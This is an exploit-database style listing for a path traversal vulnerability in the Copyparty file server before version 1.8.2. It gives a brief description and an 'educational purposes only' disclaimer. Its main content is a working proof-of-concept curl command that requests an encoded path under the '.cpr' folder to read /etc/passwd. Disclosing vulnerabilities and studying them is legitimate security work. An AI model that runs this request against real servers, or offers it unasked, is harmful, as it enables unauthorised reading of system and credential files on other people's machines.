Exploits / Vulnerability Discovered : 2023-07-28 |
Type : webapps |
Platform : python
This exploit / vulnerability Copyparty 1.8.2 directory traversal is for educational purposes only and if it is used you will do on your own risk!
#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory.
#POC
curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'